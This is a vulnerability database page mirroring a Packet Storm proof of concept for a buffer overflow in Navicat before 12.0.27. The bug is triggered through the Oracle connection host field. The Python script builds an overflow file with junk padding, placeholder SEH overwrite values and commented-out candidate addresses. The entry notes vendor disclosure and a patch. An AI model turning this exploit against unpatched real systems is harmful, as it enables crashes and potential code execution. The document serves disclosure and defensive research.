Lucene search
+L

Navicat Oracle Connection Overflow

🗓️ 27 Apr 2018 00:00:00Reported by Kevin McGuiganType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Navicat Oracle Connection Overflow, 12.0.27, Windows 7 32-bi

Code
`#!/usr/bin/python  
# Title: Navicat < 12.0.27 Oracle Connection Overflow  
# Author: Kevin McGuigan  
# Twitter: @_h3xagram  
# Author Website: https://www.7elements.co.uk  
# Vendor Website: https://www.navicat.com  
# Date: 27/04/2018  
# Version: 12.0.26  
# Tested on Windows 7 32-bit  
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.  
  
  
# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.   
filename="navicatPOC.txt"  
junk = "A" * 1502  
#nseh = "\x4C\x4C\x77\x04"  
#seh= "\x75\x2a\x01\x10"  
nseh = "B" * 4  
seh = "C" * 4  
fill = "D" * 4000  
buffer = junk + nseh + seh + fill  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation